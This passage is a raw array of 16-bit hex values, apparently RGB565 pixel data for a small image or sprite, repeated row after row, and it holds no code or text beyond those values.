0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xe8e4, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xe8e4, 0xffff, 0xffff, 0xffff, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0xef36, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0x0000, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0xcf6c, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 